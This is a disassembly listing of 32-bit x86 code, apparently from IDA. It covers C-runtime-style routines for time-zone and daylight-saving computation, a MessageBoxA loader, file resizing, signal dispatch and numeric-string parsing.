loc_42D24F: ; CODE XREF: sub_42D078+1E6�j
mov al, [esi]
cmp al, 2Bh
jz short loc_42D25D
cmp al, bl
jl short loc_42D260
cmp al, 39h
jg short loc_42D260
loc_42D25D: ; CODE XREF: sub_42D078+1DB�j
inc esi
jmp short loc_42D24F
; ---------------------------------------------------------------------------
loc_42D260: ; CODE XREF: sub_42D078+1DF�j
; sub_42D078+1E3�j
cmp byte ptr [esi], 3Ah
jnz short loc_42D2B3
inc esi
push esi
call sub_422ACF
imul eax, 3Ch
pop ecx
mov ecx, dword_44C010
add ecx, eax
mov dword_44C010, ecx
loc_42D27E: ; CODE XREF: sub_42D078+211�j
mov al, [esi]
cmp al, bl
jl short loc_42D28B
cmp al, 39h
jg short loc_42D28B
inc esi
jmp short loc_42D27E
; ---------------------------------------------------------------------------
loc_42D28B: ; CODE XREF: sub_42D078+20A�j
; sub_42D078+20E�j
cmp byte ptr [esi], 3Ah
jnz short loc_42D2B3
inc esi
push esi
call sub_422ACF
pop ecx
mov ecx, dword_44C010
add ecx, eax
mov dword_44C010, ecx
loc_42D2A6: ; CODE XREF: sub_42D078+239�j
mov al, [esi]
cmp al, bl
jl short loc_42D2B3
cmp al, 39h
jg short loc_42D2B3
inc esi
jmp short loc_42D2A6
; ---------------------------------------------------------------------------
loc_42D2B3: ; CODE XREF: sub_42D078+1EB�j
; sub_42D078+216�j ...
cmp [ebp+var_8], 0
jz short loc_42D2C1
neg ecx
mov dword_44C010, ecx
loc_42D2C1: ; CODE XREF: sub_42D078+23F�j
movsx eax, byte ptr [esi]
test eax, eax
mov dword_44C014, eax
jz short loc_42D2E9
push 3
push esi
push off_44C0A0
call sub_4222F0
mov eax, off_44C0A0
add esp, 0Ch
and byte ptr [eax+3], 0
jmp short loc_42D2FA
; ---------------------------------------------------------------------------
loc_42D2E9: ; CODE XREF: sub_42D078+121�j
; sub_42D078+12A�j ...
mov eax, off_44C0A0
and byte ptr [eax], 0
jmp short loc_42D2FA
; ---------------------------------------------------------------------------
loc_42D2F3: ; CODE XREF: sub_42D078+141�j
; sub_42D078+15B�j ...
push edi
call sub_428497
pop ecx
loc_42D2FA: ; CODE XREF: sub_42D078+57�j
; sub_42D078+139�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_42D078 endp
; =============== S U B R O U T I N E =======================================
sub_42D2FF proc near ; CODE XREF: sub_429DCB+A5�p
arg_0 = dword ptr 4
push esi
push 0Bh
call sub_428436
push [esp+8+arg_0]
call sub_42D320
push 0Bh
mov esi, eax
call sub_428497
add esp, 0Ch
mov eax, esi
pop esi
retn
sub_42D2FF endp
; =============== S U B R O U T I N E =======================================
sub_42D320 proc near ; CODE XREF: sub_42D2FF+C�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor edi, edi
cmp dword_44C014, edi
jnz short loc_42D334
loc_42D32D: ; CODE XREF: sub_42D320+148�j
; sub_42D320+150�j ...
xor eax, eax
jmp loc_42D480
; ---------------------------------------------------------------------------
loc_42D334: ; CODE XREF: sub_42D320+B�j
mov esi, [esp+0Ch+arg_0]
push 1
pop ebx
mov eax, [esi+14h]
cmp eax, dword_44C0A8
jnz short loc_42D352
cmp eax, dword_44C0B8
jz loc_42D454
loc_42D352: ; CODE XREF: sub_42D320+24�j
cmp dword_631668, edi
jz loc_42D42A
movzx ecx, word_631716
push ecx
cmp word_631708, di
movzx ecx, word_631714
push ecx
movzx ecx, word_631712
push ecx
movzx ecx, word_631710
push ecx
jnz short loc_42D3A4
movzx ecx, word_63170C
push edi
push ecx
movzx ecx, word_63170E
push ecx
movzx ecx, word_63170A
push ecx
push eax
push ebx
jmp short loc_42D3B8
; ---------------------------------------------------------------------------
loc_42D3A4: ; CODE XREF: sub_42D320+65�j
movzx ecx, word_63170E
push ecx
push edi
movzx ecx, word_63170A
push edi
push ecx
push eax
push edi
loc_42D3B8: ; CODE XREF: sub_42D320+82�j
push ebx
call sub_42D4CC
movzx eax, word_6316C2
add esp, 2Ch
cmp word_6316B4, di
push eax
movzx eax, word_6316C0
push eax
movzx eax, word_6316BE
push eax
movzx eax, word_6316BC
push eax
jnz short loc_42D412
movzx eax, word_6316B8
push edi
push eax
movzx eax, word_6316BA
push eax
movzx eax, word_6316B6
push eax
push dword ptr [esi+14h]
push ebx
loc_42D407: ; CODE XREF: sub_42D320+108�j
push edi
call sub_42D4CC
add esp, 2Ch
jmp short loc_42D454
; ---------------------------------------------------------------------------
loc_42D412: ; CODE XREF: sub_42D320+C8�j
movzx eax, word_6316BA
push eax
push edi
movzx eax, word_6316B6
push edi
push eax
push dword ptr [esi+14h]
push edi
jmp short loc_42D407
; ---------------------------------------------------------------------------
loc_42D42A: ; CODE XREF: sub_42D320+38�j
push edi
push edi
push edi
push 2
push edi
push edi
push ebx
push 4
push eax
push ebx
push ebx
call sub_42D4CC
push edi
push edi
push edi
push 2
push edi
push edi
push 5
push 0Ah
push dword ptr [esi+14h]
push ebx
push edi
call sub_42D4CC
add esp, 58h
loc_42D454: ; CODE XREF: sub_42D320+2C�j
; sub_42D320+F0�j
mov edx, dword_44C0AC
mov eax, dword_44C0BC
mov ecx, [esi+1Ch]
cmp edx, eax
jge short loc_42D484
cmp ecx, edx
jl loc_42D32D
cmp ecx, eax
jg loc_42D32D
cmp ecx, edx
jle short loc_42D498
cmp ecx, eax
jge short loc_42D498
loc_42D47E: ; CODE XREF: sub_42D320+166�j
; sub_42D320+16A�j
mov eax, ebx
loc_42D480: ; CODE XREF: sub_42D320+F�j
; sub_42D320+19D�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_42D484: ; CODE XREF: sub_42D320+144�j
cmp ecx, eax
jl short loc_42D47E
cmp ecx, edx
jg short loc_42D47E
cmp ecx, eax
jle short loc_42D498
cmp ecx, edx
jl loc_42D32D
loc_42D498: ; CODE XREF: sub_42D320+158�j
; sub_42D320+15C�j ...
mov eax, [esi+8]
imul eax, 3Ch
add eax, [esi+4]
imul eax, 3Ch
add eax, [esi]
imul eax, 3E8h
cmp ecx, edx
jnz short loc_42D4BF
xor ecx, ecx
cmp eax, dword_44C0B0
setnl cl
loc_42D4BB: ; CODE XREF: sub_42D320+1AA�j
mov eax, ecx
jmp short loc_42D480
; ---------------------------------------------------------------------------
loc_42D4BF: ; CODE XREF: sub_42D320+18E�j
xor ecx, ecx
cmp eax, dword_44C0C0
setl cl
jmp short loc_42D4BB
sub_42D320 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D4CC proc near ; CODE XREF: sub_42D320+99�p
; sub_42D320+E8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 1
push ebx
mov ebx, [ebp+arg_8]
push esi
jnz loc_42D567
mov eax, [ebp+arg_C]
mov [ebp+arg_8], ebx
and [ebp+arg_8], 3
mov esi, eax
jnz short loc_42D4F7
shl esi, 2
mov eax, dword_44C0C0[esi]
jmp short loc_42D500
; ---------------------------------------------------------------------------
loc_42D4F7: ; CODE XREF: sub_42D4CC+1E�j
shl esi, 2
mov eax, dword_44C0F4[esi]
loc_42D500: ; CODE XREF: sub_42D4CC+29�j
mov edx, ebx
lea ecx, [eax+1]
imul edx, 16Dh
lea eax, [ebx-1]
push edi
sar eax, 2
mov edi, ecx
push 7
add edi, eax
lea eax, [edx+edi-63DBh]
pop edi
cdq
idiv edi
mov eax, [ebp+arg_10]
pop edi
cmp edx, [ebp+arg_14]
jg short loc_42D53A
imul eax, 7
sub eax, edx
add eax, [ebp+arg_14]
lea ecx, [ecx+eax-7]
jmp short loc_42D544
; ---------------------------------------------------------------------------
loc_42D53A: ; CODE XREF: sub_42D4CC+5E�j
imul eax, 7
sub eax, edx
add eax, [ebp+arg_14]
add ecx, eax
loc_42D544: ; CODE XREF: sub_42D4CC+6C�j
cmp [ebp+arg_10], 5
jnz short loc_42D582
cmp [ebp+arg_8], 0
jnz short loc_42D558
mov esi, dword_44C0C4[esi]
jmp short loc_42D55E
; ---------------------------------------------------------------------------
loc_42D558: ; CODE XREF: sub_42D4CC+82�j
mov esi, dword_44C0F8[esi]
loc_42D55E: ; CODE XREF: sub_42D4CC+8A�j
cmp ecx, esi
jle short loc_42D582
sub ecx, 7
jmp short loc_42D582
; ---------------------------------------------------------------------------
loc_42D567: ; CODE XREF: sub_42D4CC+C�j
mov eax, [ebp+arg_C]
test bl, 3
jnz short loc_42D578
mov ecx, dword_44C0C0[eax*4]
jmp short loc_42D57F
; ---------------------------------------------------------------------------
loc_42D578: ; CODE XREF: sub_42D4CC+A1�j
mov ecx, dword_44C0F4[eax*4]
loc_42D57F: ; CODE XREF: sub_42D4CC+AA�j
add ecx, [ebp+arg_18]
loc_42D582: ; CODE XREF: sub_42D4CC+7C�j
; sub_42D4CC+94�j ...
cmp [ebp+arg_0], 1
jnz short loc_42D5B3
mov eax, [ebp+arg_1C]
mov dword_44C0AC, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
mov dword_44C0A8, ebx
imul eax, 3Ch
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
mov dword_44C0B0, eax
jmp short loc_42D608
; ---------------------------------------------------------------------------
loc_42D5B3: ; CODE XREF: sub_42D4CC+BA�j
mov eax, [ebp+arg_1C]
mov dword_44C0BC, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
imul eax, 3Ch
add eax, dword_44C018
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
mov dword_44C0C0, eax
jns short loc_42D5EB
add eax, 5265C00h
dec ecx
mov dword_44C0C0, eax
jmp short loc_42D5FC
; ---------------------------------------------------------------------------
loc_42D5EB: ; CODE XREF: sub_42D4CC+110�j
mov edx, 5265C00h
cmp eax, edx
jl short loc_42D602
sub eax, edx
inc ecx
mov dword_44C0C0, eax
loc_42D5FC: ; CODE XREF: sub_42D4CC+11D�j
mov dword_44C0BC, ecx
loc_42D602: ; CODE XREF: sub_42D4CC+126�j
mov dword_44C0B8, ebx
loc_42D608: ; CODE XREF: sub_42D4CC+E5�j
pop esi
pop ebx
pop ebp
retn
sub_42D4CC endp
; =============== S U B R O U T I N E =======================================
sub_42D60C proc near ; CODE XREF: sub_42B1D5+2B�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_42D61D
add esp, 0Ch
retn
sub_42D60C endp
; =============== S U B R O U T I N E =======================================
sub_42D61D proc near ; CODE XREF: sub_42D60C+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test byte_631881[eax], cl
jnz short loc_42D64A
cmp [esp+arg_4], 0
jz short loc_42D643
movzx eax, word_449842[eax*2]
and eax, [esp+arg_4]
jmp short loc_42D645
; ---------------------------------------------------------------------------
loc_42D643: ; CODE XREF: sub_42D61D+16�j
xor eax, eax
loc_42D645: ; CODE XREF: sub_42D61D+24�j
test eax, eax
jnz short loc_42D64A
retn
; ---------------------------------------------------------------------------
loc_42D64A: ; CODE XREF: sub_42D61D+F�j
; sub_42D61D+2A�j
push 1
pop eax
retn
sub_42D61D endp
; =============== S U B R O U T I N E =======================================
sub_42D64E proc near ; CODE XREF: sub_42B69E+11F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
cmp dword_631724, ebx
push esi
push edi
jnz short loc_42D69D
push offset aUser32_dll ; "user32.dll"
call dword_42F138 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_42D6D3
mov esi, dword_42F13C
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; dword_42F13C
test eax, eax
mov dword_631724, eax
jz short loc_42D6D3
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; dword_42F13C
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov dword_631728, eax
call esi ; dword_42F13C
mov dword_63172C, eax
loc_42D69D: ; CODE XREF: sub_42D64E+B�j
mov eax, dword_631728
test eax, eax
jz short loc_42D6BC
call eax ; dword_631728
mov ebx, eax
test ebx, ebx
jz short loc_42D6BC
mov eax, dword_63172C
test eax, eax
jz short loc_42D6BC
push ebx
call eax ; dword_63172C
mov ebx, eax
loc_42D6BC: ; CODE XREF: sub_42D64E+56�j
; sub_42D64E+5E�j ...
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
push ebx
call dword_631724 ; MessageBoxA
loc_42D6CF: ; CODE XREF: sub_42D64E+87�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_42D6D3: ; CODE XREF: sub_42D64E+1C�j
; sub_42D64E+33�j
xor eax, eax
jmp short loc_42D6CF
sub_42D64E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D6D7 proc near ; CODE XREF: sub_42BF9A+28A�p
var_1004 = byte ptr -1004h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1004h
call sub_4220C0
push ebx
push esi
xor esi, esi
push 1
push esi
push [ebp+arg_0]
call sub_426D61
or ebx, 0FFFFFFFFh
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_4], eax
jz loc_42D7F6
push 2
push esi
push [ebp+arg_0]
call sub_426D61
add esp, 0Ch
cmp eax, ebx
jz loc_42D7F6
push edi
mov edi, [ebp+arg_4]
sub edi, eax
test edi, edi
jle short loc_42D799
mov ebx, 1000h
lea eax, [ebp+var_1004]
push ebx
push esi
push eax
call sub_4221F0
push 8000h
push [ebp+arg_0]
call sub_42E8B1
add esp, 14h
mov [ebp+arg_4], eax
loc_42D74A: ; CODE XREF: sub_42D6D7+99�j
cmp edi, ebx
mov eax, ebx
jge short loc_42D752
mov eax, edi
loc_42D752: ; CODE XREF: sub_42D6D7+77�j
push eax
lea eax, [ebp+var_1004]
push eax
push [ebp+arg_0]
call sub_42AED2
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_42D772
sub edi, eax
test edi, edi
jle short loc_42D78A
jmp short loc_42D74A
; ---------------------------------------------------------------------------
loc_42D772: ; CODE XREF: sub_42D6D7+91�j
call sub_426531
cmp dword ptr [eax], 5
jnz short loc_42D787
call sub_426528
mov dword ptr [eax], 0Dh
loc_42D787: ; CODE XREF: sub_42D6D7+A3�j
or esi, 0FFFFFFFFh
loc_42D78A: ; CODE XREF: sub_42D6D7+97�j
push [ebp+arg_4]
push [ebp+arg_0]
call sub_42E8B1
pop ecx
pop ecx
jmp short loc_42D7E1
; ---------------------------------------------------------------------------
loc_42D799: ; CODE XREF: sub_42D6D7+4B�j
jge short loc_42D7E1
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_426D61
push [ebp+arg_0]
call sub_42BE44
add esp, 10h
push eax
call dword_42F134 ; SetEndOfFile
mov esi, eax
neg esi
sbb esi, esi
neg esi
dec esi
cmp esi, ebx
jnz short loc_42D7E1
call sub_426528
mov dword ptr [eax], 0Dh
call dword_42F068 ; RtlGetLastWin32Error
mov edi, eax
call sub_426531
mov [eax], edi
loc_42D7E1: ; CODE XREF: sub_42D6D7+C0�j
; sub_42D6D7:loc_42D799�j ...
push 0
push [ebp+var_4]
push [ebp+arg_0]
call sub_426D61
add esp, 0Ch
mov eax, esi
pop edi
jmp short loc_42D7F8
; ---------------------------------------------------------------------------
loc_42D7F6: ; CODE XREF: sub_42D6D7+27�j
; sub_42D6D7+3D�j
mov eax, ebx
loc_42D7F8: ; CODE XREF: sub_42D6D7+11D�j
pop esi
pop ebx
leave
retn
sub_42D6D7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D7FC proc near ; CODE XREF: sub_429A8C+3533�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
and [ebp+var_4], 0
dec eax
push ebx
push esi
dec eax
push edi
jz short loc_42D877
dec eax
dec eax
jz short loc_42D85A
sub eax, 4
jz short loc_42D85A
sub eax, 3
jz short loc_42D85A
sub eax, 4
jz short loc_42D84D
sub eax, 6
jz short loc_42D840
dec eax
jz short loc_42D833
or eax, 0FFFFFFFFh
jmp loc_42D979
; ---------------------------------------------------------------------------
loc_42D833: ; CODE XREF: sub_42D7FC+2D�j
mov ebx, dword_63173C
mov edi, offset dword_63173C
jmp short loc_42D882
; ---------------------------------------------------------------------------
loc_42D840: ; CODE XREF: sub_42D7FC+2A�j
mov ebx, dword_631738
mov edi, offset dword_631738
jmp short loc_42D882
; ---------------------------------------------------------------------------
loc_42D84D: ; CODE XREF: sub_42D7FC+25�j
mov ebx, dword_631740
mov edi, offset dword_631740
jmp short loc_42D882
; ---------------------------------------------------------------------------
loc_42D85A: ; CODE XREF: sub_42D7FC+16�j
; sub_42D7FC+1B�j ...
call sub_42599D
mov esi, eax
push dword ptr [esi+50h]
push [ebp+arg_0]
call sub_42D97E
mov edi, eax
pop ecx
add edi, 8
pop ecx
mov ebx, [edi]
jmp short loc_42D894
; ---------------------------------------------------------------------------
loc_42D877: ; CODE XREF: sub_42D7FC+12�j
mov ebx, dword_631734
mov edi, offset dword_631734
loc_42D882: ; CODE XREF: sub_42D7FC+42�j
; sub_42D7FC+4F�j ...
push 1
mov [ebp+var_4], 1
call sub_428436
mov esi, [ebp+arg_0]
pop ecx
loc_42D894: ; CODE XREF: sub_42D7FC+79�j
cmp ebx, 1
jnz short loc_42D8AF
cmp [ebp+var_4], 0
jz loc_42D977
push ebx
call sub_428497
pop ecx
jmp loc_42D977
; ---------------------------------------------------------------------------
loc_42D8AF: ; CODE XREF: sub_42D7FC+9B�j
xor ecx, ecx
cmp ebx, ecx
jnz short loc_42D8C9
cmp [ebp+var_4], ecx
jz short loc_42D8C2
push 1
call sub_428497
pop ecx
loc_42D8C2: ; CODE XREF: sub_42D7FC+BC�j
push 3
call sub_4284EA
loc_42D8C9: ; CODE XREF: sub_42D7FC+B7�j
mov eax, [ebp+arg_0]
cmp eax, 8
jz short loc_42D8DB
cmp eax, 0Bh
jz short loc_42D8DB
cmp eax, 4
jnz short loc_42D8F6
loc_42D8DB: ; CODE XREF: sub_42D7FC+D3�j
; sub_42D7FC+D8�j
mov edx, [esi+54h]
cmp eax, 8
mov [ebp+var_8], edx
mov [esi+54h], ecx
jnz short loc_42D932
mov edx, [esi+58h]
mov dword ptr [esi+58h], 8Ch
mov [ebp+var_C], edx
loc_42D8F6: ; CODE XREF: sub_42D7FC+DD�j
cmp eax, 8
jnz short loc_42D932
mov ecx, dword_44BF28
mov eax, dword_44BF2C
add eax, ecx
cmp ecx, eax
jge short loc_42D934
lea eax, [ecx+ecx*2]
shl eax, 2
loc_42D912: ; CODE XREF: sub_42D7FC+132�j
mov edx, [esi+50h]
add eax, 0Ch
and dword ptr [edx+eax-4], 0
mov edx, dword_44BF28
mov edi, dword_44BF2C
inc ecx
add edi, edx
cmp ecx, edi
jl short loc_42D912
jmp short loc_42D934
; ---------------------------------------------------------------------------
loc_42D932: ; CODE XREF: sub_42D7FC+EB�j
; sub_42D7FC+FD�j
mov [edi], ecx
loc_42D934: ; CODE XREF: sub_42D7FC+10E�j
; sub_42D7FC+134�j
cmp [ebp+var_4], 0
jz short loc_42D942
push 1
call sub_428497
pop ecx
loc_42D942: ; CODE XREF: sub_42D7FC+13C�j
cmp [ebp+arg_0], 8
jnz short loc_42D953
push dword ptr [esi+58h]
push 8
call ebx
pop ecx
pop ecx
jmp short loc_42D965
; ---------------------------------------------------------------------------
loc_42D953: ; CODE XREF: sub_42D7FC+14A�j
push [ebp+arg_0]
call ebx
cmp [ebp+arg_0], 0Bh
pop ecx
jz short loc_42D965
cmp [ebp+arg_0], 4
jnz short loc_42D977
loc_42D965: ; CODE XREF: sub_42D7FC+155�j
; sub_42D7FC+161�j
mov eax, [ebp+var_8]
cmp [ebp+arg_0], 8
mov [esi+54h], eax
jnz short loc_42D977
mov eax, [ebp+var_C]
mov [esi+58h], eax
loc_42D977: ; CODE XREF: sub_42D7FC+A1�j
; sub_42D7FC+AE�j ...
xor eax, eax
loc_42D979: ; CODE XREF: sub_42D7FC+32�j
pop edi
pop esi
pop ebx
leave
retn
sub_42D7FC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42D97E proc near ; CODE XREF: sub_42D7FC+6B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov ecx, dword_44BF34
push esi
mov esi, [esp+4+arg_0]
cmp [edx+4], esi
push edi
mov eax, edx
jz short loc_42D9A7
lea edi, [ecx+ecx*2]
lea edi, [edx+edi*4]
loc_42D99B: ; CODE XREF: sub_42D97E+27�j
add eax, 0Ch
cmp eax, edi
jnb short loc_42D9A7
cmp [eax+4], esi
jnz short loc_42D99B
loc_42D9A7: ; CODE XREF: sub_42D97E+15�j
; sub_42D97E+22�j
lea ecx, [ecx+ecx*2]
lea ecx, [edx+ecx*4]
cmp eax, ecx
jnb short loc_42D9B6
cmp [eax+4], esi
jz short loc_42D9B8
loc_42D9B6: ; CODE XREF: sub_42D97E+31�j
xor eax, eax
loc_42D9B8: ; CODE XREF: sub_42D97E+36�j
pop edi
pop esi
retn
sub_42D97E endp
; =============== S U B R O U T I N E =======================================
sub_42D9BB proc near ; CODE XREF: sub_42C418+2B�p
; sub_42C418+42�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_0]
push esi
mov esi, [esp+4+arg_4]
xor eax, eax
lea ecx, [edx+esi]
cmp ecx, edx
jb short loc_42D9D1
cmp ecx, esi
jnb short loc_42D9D4
loc_42D9D1: ; CODE XREF: sub_42D9BB+10�j
push 1
pop eax
loc_42D9D4: ; CODE XREF: sub_42D9BB+14�j
mov edx, [esp+4+arg_8]
pop esi
mov [edx], ecx
retn
sub_42D9BB endp
; =============== S U B R O U T I N E =======================================
sub_42D9DC proc near ; CODE XREF: sub_42DA95+40�p
; sub_42DA95+61�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
mov edi, [esp+8+arg_4]
push esi
push dword ptr [edi]
push dword ptr [esi]
call sub_42D9BB
add esp, 0Ch
test eax, eax
jz short loc_42DA0E
lea eax, [esi+4]
push eax
push 1
push dword ptr [eax]
call sub_42D9BB
add esp, 0Ch
test eax, eax
jz short loc_42DA0E
inc dword ptr [esi+8]
loc_42DA0E: ; CODE XREF: sub_42D9DC+19�j
; sub_42D9DC+2D�j
lea eax, [esi+4]
push eax
push dword ptr [edi+4]
push dword ptr [eax]
call sub_42D9BB
add esp, 0Ch
test eax, eax
jz short loc_42DA26
inc dword ptr [esi+8]
loc_42DA26: ; CODE XREF: sub_42D9DC+45�j
lea eax, [esi+8]
push eax
push dword ptr [edi+8]
push dword ptr [eax]
call sub_42D9BB
add esp, 0Ch
pop edi
pop esi
retn
sub_42D9DC endp
; =============== S U B R O U T I N E =======================================
sub_42DA3A proc near ; CODE XREF: sub_42DA95+30�p
; sub_42DA95+36�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
mov esi, [eax]
mov edi, [eax+4]
mov ecx, esi
add esi, esi
mov [eax], esi
lea esi, [edi+edi]
shr ecx, 1Fh
or esi, ecx
mov ecx, [eax+8]
mov edx, edi
mov [eax+4], esi
shr edx, 1Fh
shl ecx, 1
or ecx, edx
pop edi
mov [eax+8], ecx
pop esi
retn
sub_42DA3A endp
; =============== S U B R O U T I N E =======================================
sub_42DA68 proc near ; CODE XREF: sub_42E02D+1C8�p
; sub_42E912+17D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
mov edx, [eax+8]
mov ecx, [eax+4]
mov esi, edx
mov edi, ecx
shl esi, 1Fh
shr ecx, 1
or ecx, esi
mov [eax+4], ecx
mov ecx, [eax]
shl edi, 1Fh
shr ecx, 1
shr edx, 1
or ecx, edi
pop edi
mov [eax+8], edx
mov [eax], ecx
pop esi
retn
sub_42DA68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42DA95 proc near ; CODE XREF: sub_42DB5C+3CA�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_8]
xor edx, edx
cmp eax, edx
push esi
mov [ebp+var_4], 404Eh
mov [ebx], edx
mov [ebx+4], edx
mov [ebx+8], edx
jbe short loc_42DB09
push edi
mov [ebp+arg_8], eax
loc_42DABC: ; CODE XREF: sub_42DA95+6F�j
mov esi, ebx
lea edi, [ebp+var_10]
movsd
movsd
push ebx
movsd
call sub_42DA3A
push ebx
call sub_42DA3A
lea eax, [ebp+var_10]
push eax
push ebx
call sub_42D9DC
push ebx
call sub_42DA3A
mov eax, [ebp+arg_0]
and [ebp+var_C], 0
and [ebp+var_8], 0
movsx eax, byte ptr [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_10]
push eax
push ebx
call sub_42D9DC
add esp, 1Ch
inc [ebp+arg_0]
dec [ebp+arg_8]
jnz short loc_42DABC
xor edx, edx
pop edi
loc_42DB09: ; CODE XREF: sub_42DA95+21�j
; sub_42DA95+9F�j
cmp [ebx+8], edx
jnz short loc_42DB36
mov ecx, [ebx+4]
mov eax, ecx
shr eax, 10h
mov [ebx+8], eax
mov eax, [ebx]
mov esi, eax
shr esi, 10h
shl ecx, 10h
or esi, ecx
shl eax, 10h
add [ebp+var_4], 0FFF0h
mov [ebx+4], esi
mov [ebx], eax
jmp short loc_42DB09
; ---------------------------------------------------------------------------
loc_42DB36: ; CODE XREF: sub_42DA95+77�j
mov esi, 8000h
loc_42DB3B: ; CODE XREF: sub_42DA95+B9�j
test [ebx+8], esi
jnz short loc_42DB50
push ebx
call sub_42DA3A
add [ebp+var_4], 0FFFFh
pop ecx
jmp short loc_42DB3B
; ---------------------------------------------------------------------------
loc_42DB50: ; CODE XREF: sub_42DA95+A9�j
mov ax, word ptr [ebp+var_4]
pop esi
mov [ebx+0Ah], ax
pop ebx
leave
retn
sub_42DA95 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42DB5C proc near ; CODE XREF: sub_42C761+17�p
; sub_42C78E+17�p
var_5C = byte ptr -5Ch
var_45 = byte ptr -45h
var_40 = dword ptr -40h
var_3A = dword ptr -3Ah
var_36 = dword ptr -36h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 5Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea eax, [ebp+var_5C]
push 1
mov [ebp+var_C], eax
xor eax, eax
pop edx
mov [ebp+var_28], eax
mov [ebp+var_18], edx
mov [ebp+var_4], eax
mov [ebp+var_10], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_2C], eax
mov [ebp+var_30], eax
mov [ebp+var_1C], eax
mov [ebp+var_8], eax
mov [ebp+var_14], eax
mov [ebp+arg_8], edi
loc_42DB97: ; CODE XREF: sub_42DB5C+52�j
mov cl, [edi]
cmp cl, 20h
jz short loc_42DBAD
cmp cl, 9
jz short loc_42DBAD
cmp cl, 0Ah
jz short loc_42DBAD
cmp cl, 0Dh
jnz short loc_42DBB0
loc_42DBAD: ; CODE XREF: sub_42DB5C+40�j
; sub_42DB5C+45�j ...
inc edi
jmp short loc_42DB97
; ---------------------------------------------------------------------------
loc_42DBB0: ; CODE XREF: sub_42DB5C+4F�j
push 4
pop esi
loc_42DBB3: ; CODE XREF: sub_42DB5C+AE�j
; sub_42DB5C+B7�j ...
mov bl, [edi]
inc edi
cmp eax, 0Bh ; switch 12 cases
ja loc_42DE36 ; default
; jumptable 0042DBBF case 10
jmp off_42DFFD[eax*4] ; switch jump
loc_42DBC6: ; DATA XREF: .text:off_42DFFD�o
cmp bl, 31h ; jumptable 0042DBBF case 0
jl short loc_42DBD7
cmp bl, 39h
jg short loc_42DBD7
loc_42DBD0: ; CODE XREF: sub_42DB5C+C4�j
; sub_42DB5C+118�j
push 3
jmp loc_42DDF4
; ---------------------------------------------------------------------------
loc_42DBD7: ; CODE XREF: sub_42DB5C+6D�j
; sub_42DB5C+72�j
cmp bl, byte_449A48
jnz short loc_42DBE6
loc_42DBDF: ; CODE XREF: sub_42DB5C+124�j
push 5
jmp loc_42DE2C
; ---------------------------------------------------------------------------
loc_42DBE6: ; CODE XREF: sub_42DB5C+81�j
movsx eax, bl
sub eax, 2Bh
jz short loc_42DC0C
dec eax
dec eax
jz short loc_42DC00
sub eax, 3
jnz loc_42DECF
jmp loc_42DC8F
; ---------------------------------------------------------------------------
